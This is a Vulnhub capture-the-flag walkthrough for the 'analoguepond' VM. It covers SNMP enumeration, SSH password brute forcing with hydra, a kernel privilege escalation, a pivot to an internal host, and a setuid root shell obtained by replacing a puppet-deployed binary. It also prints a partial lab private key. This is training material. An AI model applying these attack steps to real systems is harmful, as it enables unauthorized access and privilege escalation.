/ vulnhub

[Vulnhub] analoguepond - Walkthrough Part 1

You can find the VM download link here.

Attacker: 192.168.56.101
Victim: 192.168.56.103

First I welcomed it with a straightforward nmap scan

nmap -A 192.168.56.103

I didn't find any open port in the first round. Then I tried an udp scan and did find a 161 port.

root@kali:~/vulnerhub/analoguepond# nmap -sU 192.168.56.103

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-09 16:05 EDT

Nmap scan report for 192.168.56.103
Host is up (0.00039s latency).
Not shown: 998 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 08:00:27:0A:79:7F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1086.52 seconds

It's a snmp service. Try to gather some information about it.

root@kali:~/vulnerhub# snmp-check 192.168.56.103
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.56.103:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.56.103
  Hostname                      : analoguepond
  Description                   : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
  Contact                       : Eric Burdon <eric@example.com>
  Location                      : There is a house in New Orleans they call it...
  Uptime snmp                   : 15:46:07.20
  Uptime system                 : 15:45:30.22
  System date                   : 2017-8-9 17:59:18.0

I also tried other ways like nmap:

root@kali:~/vulnerhub# ls /usr/share/nmap/scripts/ | grep snmp
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nse
root@kali:~/vulnerhub# nmap -sU -Pn -p 161 192.168.56.103 --script=snmp-brute.nse

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-09 16:22 EDT
Nmap scan report for 192.168.56.103
Host is up (-0.17s latency).

PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials
MAC Address: 08:00:27:0A:79:7F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

There we found a 'public' string for the community name, then we can try snmpwalk

root@kali:~/vulnerhub# snmpwalk -v 1 -c public 192.168.56.103
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (5719592) 15:53:15.92
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analoguepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (10) 0:00:00.10
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (5723292) 15:53:52.92
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E1 08 09 12 07 04 00 2B 01 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 3
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 43
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB

Looks llike tons of information here we got.
Noticed this line iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-3.19.0-25-generic root=/dev/mapper/analoguepond--vg-root ro says the permission is ro read only, so it's more possible to find info than exploit this snmp service.
There is a username eric. iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
And there is something like a hint: iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
Googled it, the hint should refer to this:

There is a house in New Orleans 
They call the Rising Sun

So suppose it's the password, try it:

root@kali:~/vulnerhub/analoguepond# cat pass
risingsun
therisingsun
houseoftherisingsun
rising sun
the rising sun
house of the rising sun

root@kali:~/vulnerhub/analoguepond# john --wordlist:pass --rules --stdout > pass1
Press 'q' or Ctrl-C to abort, almost any other key for status
157p 0:00:00:00 100.00% (2017-08-09 16:39) 872.2p/s Houseoftherisingsuning
root@kali:~/vulnerhub/analoguepond# hydra -l eric -P pass1 192.168.56.103 ssh
Hydra v8.5 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-09 16:39:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 157 login tries (l:1/p:157), ~10 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.56.103   login: eric   password: therisingsun
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-09 16:39:58

I'm in.

root@kali:~/vulnerhub/analoguepond# ssh eric@192.168.56.103
eric@192.168.56.103's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0
eric@analoguepond:~$ ls
reticulatingsplines.gif

I tunneled it out to my kali, it's only a picture, nothing special after tried some tools on it.
Then I did a find trying to escalate the privilege, but nothing special either.
Then check the version and find out it's an old and broken kernel.

eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

So download the overlayfs exploitation script here, compiled it on wherever and run it, we got the root.

eric@analoguepond:~$ ./ofs
root@analoguepond:~# whoami
root
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)

Navigated to /root, found this:

root@analoguepond:/root# ls
flag.txt
root@analoguepond:/root# cat flag.txt 
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

Ok then, let's dig deeper. Check the net status.

root@analoguepond:/root# netstat -nplt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN      1214/dnsmasq    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      932/sshd        
tcp        0      0 127.0.0.1:5900          0.0.0.0:*               LISTEN      1224/qemu-system-x8
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN      1260/qemu-system-x8
tcp6       0      0 :::22                   :::*                    LISTEN      932/sshd        

So, 5900 & 5901 first attracted me because I'm poking around with my raspberry pi recently. These two ports are for vnc service. So I want to connect to it just for my curiourcity. But it turned out failed because it asked me for a passwd and I still have nothing now.

So, I noticed that it is connecting to another network. I want to scan that net but obviously I can't do nmap or netdiscover on the victim so I choosed to ping.

root@analoguepond:/tmp# cat pingall.sh 
#!/bin/bash
# Program name: pingall.sh
trap 'exit 1;' INT
date
while IFS= read -r ip
do
    ping -c 1 "$ip" > /dev/null
    if [ $? -eq 0 ]; then
    #echo "node $output is up" 
    echo "$ip" 
    #else
    #echo "node $output is down"
    fi
done < "${1:-/dev/stdin}"

root@analoguepond:/tmp# seq -f "192.168.122.%g" 1 254 |./pingall.sh 
Wed Aug  9 18:46:12 BST 2017
192.168.122.1
192.168.122.2
192.168.122.3

Here I got three hosts up and the .1 is me.
Then, honestly, I had no idea what to do next for a long time and finally, I tried to ssh it........

root@analoguepond:/etc# ssh 192.168.122.2
+-----------------------------------------------------------------------------+
| Passwords are very dated.. Removing spaces helps sandieshaw log in with her |
| most famous song                                                            |
+-----------------------------------------------------------------------------+

A sweet hint. :D
so, username: sandieshaw, passwd: just google it you'll find it is 'puppet on a string' then 'remove spaces' -> 'puppetonastring'

sandieshaw@192.168.122.2's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Aug  9 16:33:33 BST 2017

  System load:  0.19              Processes:           116
  Usage of /:   68.6% of 1.58GB   Users logged in:     1
  Memory usage: 20%               IP address for eth0: 192.168.122.2
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Nice, I'm in. (192.168.122.2)

So, here I found a private key but I didn't know what it is for or would it be useful or not, so just left it there.

sandieshaw@puppet:~/.puppet/ssl/private_keys$ cat puppet.example.com.pem 
-----BEGIN RSA PRIVATE KEY-----
MIIJKgIBAAKCAgEAz+WFfYBB693Ka/WORuFspH34JzLjYvZcX2Tnwgk9nvlargML
SoFQl4j0r/0p5Jq9sOXS+Tj7rmYvcQv91ypvpHRC2T905JxPYB3AghuIB5QG/ugR
Cbnotu9RCbOd1dnSql5zriCfIH9kfBGaoCZ+vyAuj4OugEol3vcni4IIOT6QM1hp
j2u2fz3tgzNbEFa8LXEzkXNTXC2gW5Pc72vTwprMLhNzHhZo1TUJH3x1dF/XWzkp
75RnBIbiY14LDkZsZ+lYGEaocgL33BlTSXwiH232oR3IJCNI7Tk7YlSQLaSQhYmR

Do a find:

sandieshaw@puppet:~$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null

There is an interesting file /tmp/spin
But when I run it, there is only a cursor which spinning forever. I tried radare to reverse it, and other little tools, no luck.

there I stuck again. After viewed other's walkthrough, I navigated to /etc, and find /etc/puppet

sandieshaw@puppet:/etc/puppet$ ls
auth.conf     etckeeper-commit-post  files	      manifests  puppet.conf
environments  etckeeper-commit-pre   fileserver.conf  modules	 templates
sandieshaw@puppet:/etc/puppet/modules$ ls
fiveeights  vulnhub  wiggle
sandieshaw@puppet:/etc/puppet/modules$ cd wiggle/
sandieshaw@puppet:/etc/puppet/modules/wiggle$ ls
files  manifests
sandieshaw@puppet:/etc/puppet/modules/wiggle$ cd files/
sandieshaw@puppet:/etc/puppet/modules/wiggle/files$ ls
spin  spin.c

There are many interesting files. First, the puppet is a system that helps system managers to automatically monitor and host files on devices in the system.
Second, there is a spin.c for us.

#include <stdio.h>
#include <unistd.h>

void
advance_spinner() {
    static char bars[] = { '/', '-', '\\', '|' };
    static int nbars = sizeof(bars) / sizeof(char);
    static int pos = 0;

    printf("%c\r", bars[pos]);
    fflush(stdout);
    pos = (pos + 1) % nbars;
}

int
main() {
    while (1) {
        advance_spinner();
        usleep(300);
    }

    return 0;
}

But I can't find a easy way to exploit it. But I found this file:

sandieshaw@puppet:/etc/puppet/modules/wiggle/manifests$ cat init.pp 
## My first puppet module by Nick Leeson (C) Barringsbank
## Put spin binary in /tmp to confirm puppet is working
class wiggle {

file { [ "/tmp/spin" ]:
  ensure  => present,
  mode    => 4755,
  owner   => root,
  group   => root,
  source  => "puppet:///modules/wiggle/spin";
  }


}

honestly, I learned this from other's walkthrough.
But here I know that the /tmp/spin is synchronized from /wiggle/file/spin (I guess /file is a default path in puppet).
Which means, we can write another spin file and the puppet system would replace the /tmp/spin with it and grant it 4000 permission, which is good.

#include <stdio.h>
#include <unistd.h>

void main() {
    execvp("/bin/sh", NULL);
}

And wait for our new /tmp/spin, run it.

sandieshaw@puppet:/tmp$ ./spin 
# whoami
root
# id
uid=1000(sandieshaw) gid=1000(sandieshaw) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(sandieshaw)
# 

Got the root!

# pwd
/root/protovision
# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7  2017 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
# cat flag1.txt.0xff
3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861
# 

Finally, we got the first flag. So, this is a good point to end part 1 and I'll publish part 2 later.

Thanks for watching.

Cheers!

[Vulnhub] analoguepond - Walkthrough Part 1
Share this